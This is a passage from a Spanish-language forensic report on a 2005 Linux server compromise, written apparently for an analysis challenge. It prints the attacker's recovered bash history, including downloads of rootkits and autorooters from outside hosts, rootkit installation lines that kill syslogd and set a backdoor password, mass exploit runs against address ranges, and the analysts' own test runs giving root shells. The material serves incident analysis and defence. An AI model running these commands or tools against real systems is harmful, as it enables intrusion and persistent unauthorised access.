que usara el directorio /tmp, lo cual queda reforzado por el hecho de que más adelante vemos que
en /var/tmp/.bash_history borra el contenido de dicho directorio. Por lo tanto empezaremos mirando
en los archivos borrados de la partición raíz (hda1) que es la que contiene el directorio /tmp.
Usaremos por comodidad en este caso, la interfaz web de Autopsy para buscar la cadena de texto
“snortdos” en la parte unallocated de hda1:
19
Encuentra un acierto con la cadena “snortdos”. Si nuestra suposición es cierta podría tratarse del exploit que
estamos buscando.
Cuando verificamos lo que ha encontrado en la unidad 24866, vemos que efectivamente se trata
de parte del virus. Revisamos la unidad anterior (24866) mirando las cadenas ASCII y ¡Eureka!
vemos las cadenas de lo que parece un exploit local que aprovecha la conocida vulnerabilidad
20
ptrace 15 de los kernels 2.2 y 2.4. Más tarde, descubrimos que este exploit era la herramienta “own”
que posteriormente podemos recuperar también, del lugar del que se la descargó.
El fichero en su conjunto, ocupa 6 unidades, hemos recuperado el exploit infectado con el virus y lo
añadimos al informe como un fichero aparte.
Por lo tanto el atacante logro hacerse root a las 15:16:49 del 29 de Enero usando un exploit local
para el kernel (ptrace). El binario en cuestión esta ubicado desde la unidad 24865 a la 24870
(ocupa 6 unidades) y lo aportamos como evidencia en un fichero adjunto (exploit_ptrace_infectado)
a este informe. Hay que recordar que esta infectado con el virus RST.b y que en cualquier
ordenador vulnerable donde se ejecute será infectado con él.
Una vez que el atacante se ha hecho con los privilegios de root, comienza a instalar una serie de
herramientas que le permitirán, ocultar sus actividades y acceder de forma fácil otra vez al equipo.
Lo primero que hace a las 15:17:13 del día 29, es crear una cuenta de un usuario llamado weed
con privilegios de root y ponerle una contraseña. Este usuario lo va a crear y borrar tres veces.
/.bash_history /reto2/mactime_todo.txt
15
Información sobre la vulnerabilidad ptrace del kernel 2.2 y 2.4:
http://www.kb.cert.org/vuls/id/628849
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0127
21
0 mac -/-rw-rw---- root root 352010 /var/spool/mail/weed
191 mac -/-rw-r--r-- root root 64003 /home/weed/.bash_profile
24 mac -/-rw-r--r-- root root 64002 /home/weed/.bash_logout
Durante la sesión ftp o inmediatamente después, se bajo el exploit local para el kernel (own) que
fuel el que uso para hará escalar privilegios y también se descargo la herramienta za.tgz. Tanto
za.tgz como own se los bajo del mismo sitio web http://www.zetu.as.ro. No ha quedado rastro de las
mismas porque más tarde las borra. Se describe estas herramientas en el punto 3 del informe.
/.bash_history
rm -rf za*
rm -rf own
Entre las 15:18:35 y las 15:19:33 se descarga el rootkit SHV4 que está contenido en el fichero
crk.tar.gz y lo descomprime. Entre las 15:19:33 y las 15.21:50 ejecuta la instalación de este rootkit
por dos veces. El rootkit como ya explicamos en el punto 2.3.1.2 abre una puerta trasera por ssh
en el puerto suministrado, sin embargo falla en su instalación ¿quizás por eso lo instala por dos
veces?
/.bash_history /reto2/mactime_todo.txt
wget www.zetu.as.ro/crk.tar.gz
tar xzvf crk.tar.gz
cd crk
./install eliteaza 1
id
su
cd crk
dir
./install eliteaz 9933 Sat Jan 29 2005 15:19:33
A las 15:21:46 se descarga y descomprime el segundo rootkit que va a instalar: suckit. A las
15:22:00 lo ejecuta y como resultado renombra el /sbin/init a /sbin/initsk12. Durante la instalación
se crea un nuevo /sbin/init que contiene el rootkit que será cargado en el próximo reinicio. Como
indicamos en el punto 2.3.1.1 este rootkit también queda parcialmente instalado. Además tras
haberlo probado en nuestra maquina test, de haberse reiniciado el equipo, no habría arrancado
acabando aquí con toda la intrusión.
/root/.bash_history /reto2/mactime_todo.txt
wget xhack.150m.com/sc.tgz
tar -zxvf sc.tgz
cd sc
./inst
./sk Sat Jan 29 2005 15:22:00
22
Una vez que ha acabado, borra el directorio de instalación.
/root/.bash_history
rm -rf sc*
A continuación se descarga y ejecuta la herramienta https. Se trata de una puerta trasera escrita
en perl que analizamos más en profundidad en la sección 3 de herramientas instaladas por el
atacante.
/reto2/mactime_todo.txt
Puesto que este es el último comando que aparece en /root/.bash_history, concluimos que esta es
la última vez que se conecta como usuario root con esta shell. Esto podría no ser cierto, ya que
puede deshabilitar el logging de comandos del bash_history, pero viendo como ha “eliminado” el
resto de rastros, no creemos que lo haya hecho. Además, ya no le hace falta, puesto que ha
instalado varias puertas traseras. Termina la sesión a las 15:22:20 y no vuelve a usar esta shell.
/reto2/mactime_todo.txt
A las 15:22:22 se conecta por primera vez por ssh a localhost, usando el usuario weed. Más tarde
volverá a hacerlo.
/.bash_history /reto2/mactime_todo.txt
/.bash_history /reto2/mactime_todo.txt
A las 15:26:47 se descarga la herramienta pico que es otro backdoor. Unos segundos más tarde,
trata de ocultar la utilidad pico, renombrándola a “ “(un espacio).
/.bash_history /reto2/mactime_todo.txt
23
mv pico " "
Sat Jan 29 2005 15:26:55
/.bash_history /reto2/mactime_todo.txt
export PATH="."
“ “ Sat Jan 29 2005 15:27:01
El backdoor pico, además de abrir una puerta trasera, recoge información con una serie de
comandos y la manda por correo a la dirección radautiteam@yahoo.com de esta forma, el atacante
entre otras cosa se manda la IP de la maquina para no olvidarla y volver después.
A las 15:27:24 mata cualquier proceso llamado zbind (se equivoca las dos primeras veces). El
proceso zbind es una puerta trasera estaba contenida en el fichero za.tgz que se descargo y
ejecutó al principio del compromiso (15:11:44). Probablemente al haber abierto otra puerta trasera
con el pico, ya no necesitaba ésta.
/.bash_history /reto2/mactime_todo.txt
/usr//sbin/killall -9 zbind
/usr/sbin/killall -9 zbind
/usr/bin/killall -9 zbind Sat Jan 29 2005 15:27:24
En el mismo segundo se sale de la shell. Por lo tanto, la shell desde la que mata el proceso zbind
había sido iniciada a través del propio backdoor zbind y al matarlo la sesión finaliza abruptamente.
Por esta razón el home del usuario es el directorio raíz “/” cuando al estar trabajando como root en
un inicio de sesión normal, debería de tener el directorio /root como home.
Se conecta otra vez, pero el home que tiene ahora es el /var/tmp que es donde va a desarrollar sus
próximas acciones hasta el final de la intrusión. Seguiremos las acciones realizadas a través del
.bash_history que ha quedado en /var/tmp.
A las 15:36:34 se descarga el paquete w00t.tgz, lo descomprime y ejecuta el comando asmb. Este
paquete es un autorooter para el servidor samba y lo lanza contra la clase B 200.207.0.0/16 que en
unas rápidas consultas con el whois descubrimos que pertenece a Brasil (diversas subredes). El
w00t, escanea buscando servidores samba vulnerables y compromete de forma automatizada
todos aquellos que encuentra. Esta herramienta se describe con más detalle en el punto 3 del
presente documento.
24
/var/tmp/.bash_history /reto2/mactime_todo.txt
wget
www.zetu.as.ro/woot.tgz
tar xvfz woot.tgz Sat Jan 29 2005 15:36:34
cd w00t
./asmb 200.207
Las modificaciones de ficheros binarios del directorio /bin que sobrevienen a continuación, son
causadas por el virus OSF.a. Todos los binarios del paquete w00t están infectados con este virus
que hemos descrito con detalle en el punto 2.3.2.2. Curiosamente no afectan a los binarios que
habían sido infectados anteriormente con el virus RST.b. A continuación mostramos algunos de los
binarios infectados.
/reto2/mactime_todo.txt
Sat Jan 29 2005 15:36:43
Después de las 15:42:46 se descarga un bouncer de irc: psybnc. Dicho programa, es usado para
mantener sesiones en canales irc, ocultar la IP real, lanzar denegaciones de servicio, etc. Hay una
descripción completa del psybnc en el punto 3 del presente documento. En el equipo atacado, de
hecho, realiza dos instalaciones del psybnc. La primera en el directorio /dev/shm de la que no ha
quedado nada, porque en algún momento la borra. Vemos a continuación la secuencia de
comandos que ejecutó.
25
/var/tmp/.bash_history
cd /dev/shm
dir
wget www.zetu.as.ro/psyz.tar.gz
tar xzvf psyz.tar.gz
rm -rf psyz.tar.gz
mv psybnc local
cd local
rm -rf psybnc.conf*
wget www.zetu.as.ro/psybnc/psybnc.conf
mv psybnc "ps ax"
export PATH="."
"ps ax"
Como se puede comprobar en el cuadro anterior, se baja otro fichero de configuración y cambia el
nombre al psybnc para que parezca el comando “ps ax” y no llame la atención si alguien revisa los
procesos del sistema.
La segunda instalación la realiza en el directorio /var/tmp, a las 15:46:27 se descarga otro paquete
con el psybnc, lo descomprime y acto seguido lo ejecuta. Esto trata de a correr el irc bouncer en el
puerto 17900/tcp.
/var/tmp/.bash_history /reto2/mactime_todo.txt
Sin embargo, le da algunos fallos, pero al final arranca el bouncer. Podemos comprobarlo en los
logs que hay en el fichero /var/tmp/psybnc/log/psybnc.log
/var/tmp/psybnc/log/psybnc.log
Dos días después, el 31 de Enero a las 00:39:17 se vuelve a conectar por ssh.
/reto2/mactime_todo.txt
Mon Jan 31 2005 00:39:17
Y a las 03:12:48 alguien se conecta al psybnc de esta maquina. En el log USER1.LOG vemos que
se conecta a undernet.org.
26
/reto2/mactime_todo.txt
Mon Jan 31 2005 03:12:48
A las 11:35:07 y tras ejecutar algunos comandos del sistema (w, ps, dir) se descarga la última
herramienta que instalará: selena.tgz.
/var/tmp/.bash_history /reto2/mactime_todo.txt
/var/tmp/.bash_history /reto2/mactime_todo.txt
tar xvfz selena.tgz 206 ..c -/-rwxr-xr-x 505 505 224015 /var/tmp/selena/auto
98304 ..c -/-rw------- 505 505 224030 /var/tmp/selena/core
12557 ..c -/-rw-r--r-- 505 505 224013 /var/tmp/selena/main.c
cd selena
./assl 217.172
Las maquinas que ha encontrado vulnerables y a las que ha lanzado el exploit quedan almacenadas a las
12:03:38 en el fichero /var/tmp/selena/217.172.ssl.out a continuación ponemos una pequeña
muestra de este fichero.
/var/tmp/señema/217.172.ssl.out
./sslex 0 217.172.67.46
./sslex 16 217.172.70.43
./sslex 1 217.172.75.56
./sslex 1 217.172.76.229
./sslex 1 217.172.76.228
./sslex 1 217.172.67.164
./sslex 1 217.172.79.162
./sslex 1 217.172.76.105
27
A las 12:03:40 el atacante cierra la shell en la que estaba. A partir de ahí, la actividad que existe no
parece ser del atacante, sino que probablemente es del administrador del sistema (que se conecta
a las 12:52:57) cuando descubre la intrusión. A las 15:38:57 del día 31 de Enero, la maquina es
apagada haciendo un hard-reset.
28
3. Análisis de las herramientas instaladas por el atacante.
Describiremos a continuación la serie de programas que el atacante se baja de Internet para
instalar en la maquina. Como en la mayoría de las intrusiones, una vez que el atacante gana el
control del sistema comprometido, instala una serie de herramientas que le permiten abrir puertas
traseras para posibilitar su futuro regreso a la maquina sin levantar sospechas, instalar algún
programa que le posibilite el control remoto de la maquina atacada, ocultar sus actividades en el
sistema, etc.
Todos los programas que se baja están compilados, por lo que no tendría que realizar este paso
una vez accedido a la maquina. Esta compilación implica que no es la primera vez que entra en un
sistema sin permiso dado que los programas los tenia preparados y listos para funcionar.
Como se puede observar en el listado siguiente, la mayoría de los programas se los baja el
atacante de maquinas que se encuentran en el dominio “ro” (Rumania). Estas maquinas son
www.zetu.as.ro y www.plus.factory.home.ro y están en idioma rumano. Sólo
encontramos la maquina xhack.150m.com fuera de Rumania. Este dato nos hace pensar que el
atacante es Rumano, aunque como hemos visto anteriormente el ataque se realizo desde una
maquina ubicada en Estados Unidos.
Adjuntamos una lista con la línea en la que se aprecia el comando usado por el atacante para
bajarse los programas y los ficheros bash_history donde se encontró la traza.
A estos programas hay que añadir 2 más, za.tgz y own, que si bien se baja de Internet
probablemente en la sesión de FTP inicial, aunque no aparecen en los logs del sistema
información al respecto.
Procederemos a continuación a realizar una explicación de cada uno de los programas que se
baja.
Este paquete woot.tgz que se baja el atacante, se compone de una serie de programas y scripts
que tienen funcionalidades especificas, siendo llamados a través del script, asmb. Para llamar a
16
Definición de autorooter: http://en.wikipedia.org/wiki/Autorooter
http://www.securityfocus.com/infocus/1619
17
Explicación del exploit: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0201
Parche de RedHat: ftp://updates.redhat.com/7.3/en/os/SRPMS/samba-2.2.7-3.7.3.src.rpm
Exploits para la vulnerabilidad: http://www.securityfocus.com/bid/7294/exploit/
29
este script debemos de realizarlo pasándole como parámetro una clase B de IPS que escaneara
buscando la vulnerabilidad.
A continuación se llama al programa “vulvn“ que se alimenta del fichero anterior e intenta
identificar la versión de samba. Al igual que en la ejecución del otro programa, se crea otro fichero
con las maquinas que encuentra.
Para terminar, se realiza una llamada al programa “o0o“ que a su vez llama al programa “try” que
comprueba el tiempo de ejecución del exploit al que llama este (sambas). El programa sambas
explota la vulnerabilidad y escribe en el fichero “woot.log” que en cada una de sus líneas aparece
el comando que tiene que ejecutar el atacante para poder explotar esta funcionalidad en dichas
maquinas.
Una vez ejecutado esta línea, y si todo va como el atacante espera, al entrar en la máquina
tendríamos permisos de administrador o root, por lo que no necesitaríamos ningún programa para
subir nuestros permisos. Las líneas de este programa serán del tipo:
./samba -b 0 -v 10.0.128.128
Adjuntamos una lista de las versiones de samba y el sistema operativo que son vulnerables a este
exploit. Este listado esta sacado de la salida de los strings del programa “samba”.
sstrings sambas
54 samba-2.2.x - Debian 3.0 64 samba-2.2.x - SuSE 7.x
55 samba-2.2.x - Gentoo 1.4.x 65 samba-2.2.x - SuSE 8.x
56 samba-2.2.x - Mandrake 8.x 66 samba-2.2.x - FreeBSD 5.0
57 samba-2.2.x - Mandrake 9.0 67 samba-2.2.x - FreeBSD 4.x
58 samba-2.2.x - Redhat 9.0 68 samba-2.2.x - NetBSD 1.6
59 samba-2.2.x - Redhat 8.0 69 samba-2.2.x - NetBSD 1.5
60 samba-2.2.x - Redhat 7.x 70 samba-2.2.x - OpenBSD 3.2
61 samba-2.2.x - Redhat 6.x 71 samba-2.2.8 - OpenBSD 3.2 (package)
62 samba-2.2.x - Slackware 9.0 72 samba-2.2.7 - OpenBSD 3.2 (package)
63 samba-2.2.x - Slackware 8.x 73 samba-2.2.5 - OpenBSD 3.2 (package)
Para terminar, realizamos un ataque con este exploit sobre la nuestra maquina test, pero a
diferencia de la maquina comprometida, esta tenia el paquete de samba instalado y funcionando.
En este listado, se puede ver primero el comando ejecutado sobre la maquina a atacar y a
continuación, el acceso del programa a la maquina. La firma del creador del programa “wooooot!
kha0s owns u :)”, la ejecución del “uname”, “id” y del “uptime” y para terminar, el shell que
nos da. El comando “uname –a” se ejecuto sobre ese shell, cuando ya teníamos premisos de root
o administrador sobre la maquina atacada.
# ./samba -b 0 -v 10.0.128.128
+ Using ret: [0xbffffed4]
+ Using ret: [0xbffffda8]
+ woot woot!
--------------------------------------------------------------
wooooot! kha0s owns u :)
Linux rh73.localdomain 2.4.18-3 #1 Thu Apr 18 07:37:53 EDT 2002 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
8:03pm up 5:24, 4 users, load average: 4.39, 4.22, 4.08
uname -a
Linux rh73.localdomain 2.4.18-3 #1 Thu Apr 18 07:37:53 EDT 2002 i686 unknown
exit
30
3.2. Scanner y exploit de Apache+ssl: selena.tgz
Este paquete busca maquinas que tengan una vulnerabilidad ampliamente documentada en el
paquete OpenSSL 18 en versiones anteriores a la 0.9.6e, y al ser la versión que tiene instalada la
maquina comprometida la 0.9.6b, siendo esta la vulnerabilidad usada por el atacante para entrar
en la maquina como se pudo ver en puntos anteriores.
Una vez el atacante entra en las maquinas que son susceptibles a este bug, lo realizara con
permisos de usuario apache. Esto implica que el atacante deberá aumentar sus permisos usando
alguna vulnerabilidad local de la maquina atacada.
Este programa a diferencia del anterior, se lo baja de una página web perteneciente a una empresa
rumana que se dedica a la venta de electrodomésticos (www.plus.factory.home.ro).
Este paquete usa la misma estructura que el paquete woot.tgz, esto es, existe un script que una
vez llamado, va ejecutando comando a comando comprobando si las maquinas pasadas como
parámetros son vulnerables. Hasta que al final crea un fichero de texto donde escribe los
comandos que el atacante debería de ejecutar para conseguir acceso a la maquina explotando
esta vulnerabilidad. Como en el caso del woot, se lo baja ya compilado, con que no tiene los
problemas que le podría haber ocasionado tener que compilarlo, sobre todo a la hora de búsqueda
de compiladores, librerías, etc.
Al igual que el paquete woot, este es llamado a través del script “assl” indicándole una clase B
como entrada al programa. Lo primero que hace el script es llamar al programa “pscan2”, que va
chequeando maquina por maquina buscando las que tengan abierto el puerto 443/TCP, que es el
puerto donde por defecto corre el servidor web seguro. Como resultado de la ejecución de este
programa, crea un fichero que contiene un listado de las maquinas que tienen dicho puerto abierto.
Con la lista anteriormente creada, procede a llamar al programa “ssvuln” que intenta identificar la
versión del servidor web seguro (Apache) por si esta fuera atacable. Como viene siendo habitual,
la ejecución de este comando crea un fichero con la lista de maquinas atacables.
Para terminar se crea una lista llamada “res.log” donde indicara los comandos que debe ejecutar el
atacante si quiere entrar en las maquinas que son vulnerables a este exploit. Para crear esta lista
hace una llamada al comando “oops” que intenta entrar en todas y cada una de las maquinas
anteriormente reconocidas por tener un servidor apache.
El script termina borrando las listas creadas a lo largo de la ejecución de los diferentes comandos,
dejando únicamente el fichero “res.log” del que se ha hablado anteriormente..
A continuación vemos un listado de los sistemas operativos y sus versiones del apache que
pueden explotar este bug y posibilitar al exploit comprometer dichas maquinas. Esta lista esta
sacada de los strings del comando “sslx” que usara el atacante para entrar en la maquina que
quiera comprometer.
sstrings sslx
Mandrake Linux 8.2 (apache-1.3.23-4) Redhat Linux 7.2 (apache-1.3.26 w/PHP)
Mandrake Linux 8.1 (apache-1.3.20-3) Redhat Linux 7.2 (apache-1.3.26 worm offset)
Mandrake Linux 8.0 (apache-1.3.19-3) RedHat Linux 7.2 (apache-1.3.20-16)
Mandrake Linux 7.1 (apache-1.3.14-2) RedHat Linux 7.1 (apache-1.3.19-5)
Mandrake Linux 7.1 (apache-1.3.14 worm offset) RedHat Linux 7.0 (apache-1.3.12-25)
SuSE Linux 8.0 (apache-1.3.23) RedHat Linux 6.2 (apache-1.3.12-2)
SuSE Linux 8.0 (apache-1.3.23-137) RedHat Linux 6.1 (apache-1.3.9-4)
SuSE Linux 7.3 (apache-1.3.20) RedHat Linux 6.0 (apache-1.3.6-7)
SuSE Linux 7.2 (apache-1.3.19) Slackware 8.1-stable (apache-1.3.26)
SuSE Linux 7.1 (apache-1.3.17) Slackware 7.0 (apache-1.3.26)
SuSE Linux 7.0 (apache-1.3.12) Debian Woody GNU/Linux 3.0 (apache-1.3.26-1)
RedHat Linux 7.3 (apache-1.3.22 worm offset) Gentoo (apache-1.3.24-r2)
RedHat Linux 7.3 (apache-1.3.23-11)
18
Vulnerabilidad OpenSSL versiones < 0.9.6e http://www.cert.org/advisories/CA-2002-23.html
31
A continuación ponemos un ejemplo de la ejecución del comando que aparece en el fichero
“res.log” para posibilitar entrar en una maquina con RedHat 7.3. Nótese, que a diferencia del caso
anterior, en este caso entramos con el usuario apache, no como root, por lo que el atacante debe
realizar alguna acción para ganar permisos.
# Sending shellcode
ciphers: 0x814bac0 start_addr: 0x814ba00 SHELLCODE_OFS: 208
# Execution of stage1 shellcode succeeded, sending stage2
# Spawning shell...
/.bash_history
14 wget www.zetu.as.ro/crk.tar.gz
15 tar xzvf crk.tar.gz
16 cd crk
22 ./install eliteaz 9933
Veamos ahora lo que hace el script de instalación de este programa. En las primeras líneas de
este fichero vemos que el autor nos explica la finalidad de este programa. Vemos que el autor lo
firma como “ZeToo”. Comenta que es un backdoor que arranca un servicio ssh en la maquina que
se instala.
1 #!/bin/bash
2 #
3 # Linux all rootkit ... made for personal use and friends by ZeToo
4 # Greetz to : V-R34L , Beleaua , Azazel ...
5 # This is my first sshd backdoor so it has minimal things ...
6 # i`ll add functions in time :)
7 # No install help added coz its a "private" rk
8 # www.cycomm-lamm3rz.com
En la línea 31 y 32, comprueba los permisos para la instalación de este paquete, si el usuario que
lo instala no es root, saldría con un error. Dado que este programa se instalo en la maquina del
estudio, esto se realizo con permisos de root.
32
31 if [ "$(whoami)" != "root" ]; then
32 echo "${BLU}[+] ${RED}You dont have root access on this box ... get uid0 and retry"
Descomprime a continuación todos los ficheros que vienen con el paquete para luego copiarlos en
el sistema.
En la línea 57, mata el proceso syslog. Esto lo realiza para no dejar trazas de lo que realice a
continuación.
57 killall -9 syslogd
Mueve los ficheros descomprimidos antes del directorio lib, moviéndolos al directorio /lib del
sistema.
75 mv lib/* /lib/
Mueve el fichero /sbin/xlogin a /bin/login. En la versión 7.3 no existe ese fichero. En la línea 79
vemos que reconstruye los enlaces a las librerías del sistema para que use las librerías que hemos
copiado anteriormente.
A continuación, crea una serie de directorios donde meterá los ficheros de configuración del rootkit.
En la siguiente línea crea el password de entrada al sistema. Como ya se vio en cuando hablamos
de los scanners de rootkits, este fichero aparecía. Vemos a continuación, que ejecutando el
comando, con el password “eliteaza” da el mismo resultado que el contenido del fichero.
# ./pg eliteaz
dbSj8RE0TA3pQ
# cat /etc/ld.so.hash
dbSj8RE0TA3pQ
Según los caracteres que tiene dicha línea (13 caracteres) y el tipo, parece ser que es el password
del rootkit. Este password encriptado puede ser usado por el atacante cuando se conecte al rootkit
para conseguir una shell de root en la maquina comprometida. Esta teoría se confirmara en un
punto posterior.
33
Además este fichero no se copio a la maquina cuando de instalo la primera vez, por lo que se
deduce que fue instalado a posteriori después de la fecha de instalación del equipo.
Copia el fichero con la password con otro nombre. De este fichero ya hablamos cuando
buscábamos el rootkit.
98 cp -f /etc/ld.so.hash /lib/libext-2.so.7
Crea el archivo de configuración para el ssh, anexando un archivo ya preparado al fichero con el
puerto que ha creado anteriormente en la línea 116.
Aquí lo que realiza el script es copiar el fichero de arranque del servicio ssh a /usr/sbin/xntps
y a /lib/security/.config/. Una vez que lo copia arranca el servicio o el backdoor con la
línea “/usr/sbin/xntps –q”.
A continuación crea un fichero de arranque en /etc/rc.d/init.d con el nombre “cycomm”. Esta parte
tiene un fallo, y es que falta un enlace de este fichero al rc correspondiente, en este caso el
comando seria “ln –s /etc/rc.d/init.d/cycomm /etc/rc.d/init.d/S90cycomm”. Con
este comando se activaría el servicio la próxima vez que se arranca la maquina.
34
Borra los logs que se han podido crear en el sistema. Y los históricos del usuario root.
Este script tiene un fallo y es que no copia o mueve los comandos que se encuentran en el
directorio bin creado por el rootkit a las localizaciones de los binarios del sistema. Estos binarios
que se encuentran en este directorio están preparados para leer los ficheros creados anteriormente
y no mostrar por pantalla las palabras definidas en dichos ficheros. Por ejemplo, en el fichero
/lib/lidps1.so esta definida la palabra “xntps”, que es el backdoor que arranca este rootkit.
Si ejecutamos el binario “ps” que esta en el sistema aparece el proceso, pero si en cambio
ejecutamos el que viene con el rootkit, este proceso no aparece.
Como hemos visto en el fichero mactime_todo.txt, el atacante sustituye los binarios del sistema por
los del rootkit, esto indica que no es la primera vez que el atacante hace uso de este rootkit.
A continuación añado las líneas que debieron de salir al atacante cuando ejecuto la instalación del
rootkit sobre la maquina atacada.
[+] -------------------------------------------------------------------
35
[+] Done installing Cycomm rootkit on 10.0.128.128
[+] You can now login using ssh port 9933 and global pass eliteaz
[+] Visit www.cycomm-lamm3rz.com - #cycomm-lamm3rz @ undernet
[+] --------------------------------------------------------------------
Para terminar estudiaremos los ficheros que no se han visto en puntos anteriores. Como ya se ha
comentado, la mayoría de estos ficheros contiene una lista de palabras las cuales no serán
presentadas en las salidas de los comandos ejecutados con los binarios de este rootkit.
El fichero /usr/include/file.h podemos ver que contiene una serie de palabras que indican
accesos a librerías, ficheros de configuración, procesos arrancados etc.
1 libext-2.so.7
2 .sh
3 system
4 tksb
5 tkp
6 lblip.tk
7 tks
8 ldd.so
9 srd0
10 ldlib.5
11 .config
12 ld.so.hash
13 eggdrop
14 emech
15 psybnc
1 2 212.110
2 2 195.26
3 2 194.143
4 3 2002
5 4 2002
6 3 6667
7 4 6667
8 3 31415
9 3 31414
10 4 31415
11 4 31414
12 3 21018
13 3 21019
14 4 21018
15 4 21019
16 2 62.220
17 2 213.233
18 3 9933
19 4 9933
1 62.220
2 212.110
3 195.26
4 SH-fORCE
5 sh-fORCE
36
6 psyBNC
7 eggdrop
8 t0rn
9 torn
10 tornkit
1 3 eggdrop
2 3 bnc
3 3 psyBNC
4 3 sh-fORCE
5 3 SH-fORCE
6 3 synscan
7 3 setup
8 3 in.inetd
9 3 tk
10 3 xntps
Durante el tiempo que el atacante se encuentra en la maquina se baja 2 versiones de este bouncer
y un fichero de configuración, aun así no consigue hacer funcionar este programa.
1 PSYBNC.SYSTEM.PORT1=17900
2 PSYBNC.SYSTEM.HOST1=*
3 PSYBNC.HOSTALLOWS.ENTRY0=*;*
4 USER1.USER.LOGIN=Angel
5 USER1.USER.USER=^_^C12GuEeS WhO?
6 USER1.USER.PASS==1g'c0A0p'x1d1K1a`Y
7 USER1.USER.RIGHTS=1
8 USER1.USER.VLINK=0
9 USER1.USER.PPORT=0
10 USER1.USER.PARENT=0
11 USER1.USER.QUITTED=0
12 USER1.USER.ACOLLIDE=0
13 USER1.USER.DCCENABLED=1
14 USER1.USER.AIDLE=0
15 USER1.USER.LEAVEQUIT=0
16 USER1.USER.AUTOREJOIN=1
17 USER1.USER.SYSMSG=1
18 USER1.USER.LASTLOG=0
19 USER1.USER.AWAYNICK=Azazel
20 USER1.USER.AWAY=^_^C12By Azazel
21 USER1.USER.NICK=AzazeI
22 USER1.SERVERS.SERVER1=lelystad.nl.eu.undernet.org
23 USER1.SERVERS.PORT1=6667
24 USER1.CHANNELS.ENTRY1=#cycomm-lamm3rz
25 USER1.CHANNELS.ENTRY2=#Smenari
19
Mas información en http://www.psychoid.net/
37
26 USER1.CHANNELS.ENTRY0=#port
La primera y segunda línea crea un listener o un servicio que escucha en un puerto, que en
nuestro caso será en todas y cada una de las IPS de la maquina escuchando el puerto 17900. En
la tercera línea indica los hosts o IPS que se pueden conectar a este bouncer. Con esta línea
indica que se pueden conectar todas (all). Otras líneas que son importantes son el nombre del
usuario que usara para conectarse “Azazel”, conectándose al servidor de IRC
lelystad.nl.eu.undernet.org, usando el puerto 6667. Y una vez conectado
entra en los canales “cycomm-lamm3rz”, “Smenari” y “port”.
Estas instrucciones pueden hacer que el troyano ejecute comandos en el servidor en forma
arbitraria, o realice ataques de inundación de paquetes (flooding), a blancos específicos, pudiendo
ser usado para ataques distribuidos de denegación de servicio (DDoS).
20
Phrack articulo 7 del numero 58: http://www.phrack.org/show.php?p=58&a=7
21
Información del Troyano: http://www.vsantivirus.com/perl-shellbot-a.htm
38
3.7. Backdoor: pico
Programa que pone a correr una shell de root en el puerto 5608. Además en periodo de ejecución
envía un email a la dirección radautiteam@yahoo.com con la siguiente información sacada de los
strings de dicho fichero:
sh-2.05a# id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
Este fichero fue borrado del sistema una vez que el intruso paso de usuario apache a root. En el
punto 2.6 describimos los pasos dados para recuperar este fichero. El intruso lo descargo como
otras herramientas de http://www.zetu.as.ro/own.
Procedemos a ejecutar este programa sobre la maquina test, comprobando que un usuario de
sistema se convierte en root.
22
Información sobre la vulnerabilidad ptrace del kernel 2.2 y 2.4:
http://www.kb.cert.org/vuls/id/628849
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0127
39
[tato@rh73 tato]$ ./own
[+] Attached to 8619
[+] Signal caught
[+] Shellcode placed at 0x4000fd1d
[+] Now wait for suid shell...
sh-2.05a#
40
4. Respuestas a las preguntas del reto
En este momento, ya tenemos toda la información que necesitamos para responder a las
preguntas que se hacían en el reto.
El atacante instala varias herramientas de cada tipo en las típicas en el proceso de una intrusión
(rootkit, backdoor, autorooter para atacar a otras maquinas). La única herramienta ajena a este
proceso es el bouncer de Irc. Los bouncers se suelen usar para mantener el control de canales
mientras se esta desconectado, para ocultar la IP real al resto, para lanzar ataques de DoS, etc. El
perfil de la gente que se mete en estas guerras, suelen ser chicos jóvenes con afán de
protagonismo y un ego alto. Usan el irc para “contar sus batallitas”, luchar con grupos rivales, etc. y
los bouncer les ayudan a mantenerse anónimos en estos canales de irc, a atacar a otros y a evitar
los ataques.
En cuanto a la nacionalidad, debido a que la mayor parte de las herramientas que instala, se las
baja de un proveedor de alojamiento web gratuito alojado en Rumania y cuyas paginas están
íntegramente en rumano, parece razonable pensar que el atacante era de esa nacionalidad.
Además una de las herramientas manda un mail a una dirección de yahoo cuyo username era
radautiteam. Radauti es una pequeña ciudad rumana (35.000 habitantes) junto a la frontera con
Ukrania, probablemente los atacantes sean de esta población o muy cercana.
41
Sin embargo podría sorprender que la IP del ataque (64.202.43.190) no provenga de Rumania sino
de EEUU, en concreto de Reno, Nevada. Esto no tiene nada de sorprendente si pensamos que
desde la maquina del reto (que esta en México) ataca a otras maquinas de Brasil, Italia, Polonia,
etc. y estas percibirán el ataque con origen México. Con toda probabilidad la IP 64.202.43.190 es
una maquina previamente comprometida.
El atacante aprovecho una vulnerabilidad existente en las librerías OpenSSL iguales o inferiores a
la versión 0.9.6e. Dicha vulnerabilidad consiste en un buffer overflow durante el proceso de
negociación en SSLv2 (CA-2002-23 23 VU#102795). En concreto, el equipo del reto, tenía la versión
0.9.6b, por lo que era vulnerable a cualquier servicio que usara dichas librerías.
En este caso, el atacante entró a través del servidor seguro del apache que hace uso de estas
librerías. La entrada se produjo usando el exploit que contiene el autorooter selena.tgz. Dicho
exploit es el exploit desarrollado por Solar Eclipse solareclipse@phreedom.org y conocido como
openssl-too-open 24 .
Sin embargo, tras explotar la anterior vulnerabilidad, solo tenia acceso como usuario no
privilegiado, así que necesito de un segundo exploit, esta vez local que aprovechaba una
vulnerabilidad en los kernels 2.2 y 2.4 al realizar una llamada a la función ptrace(). Por lo tanto, lo
descarga como usuario apache y tras su ejecución, se convirtió en root del sistema culminando la
escalada de privilegios.
23
CA-2002-23: http://www.cert.org/advisories/CA-2002-23.html
24
openssl-too-open: http://www.phreedom.org/solar/exploits/apache-openssl/
42
• Activar el firewall (iptables) del kernel de Linux. Permitirá tener un control exhaustivo sobre
quien puede conectarse a qué servicio en la máquina. Tampoco sería mala idea el montaje
de un firewall que trabajase a nivel de aplicación y no solo como firewall de paquetes.
• Se deberían cambiar las contraseñas del usuario root y Contador, así como de todos los
usuarios que han usado la maquina para conectarse a otras maquinas. Aunque no hay
constancia de la instalación de ningún sniffer (el que viene con Suckit fallo), sería también
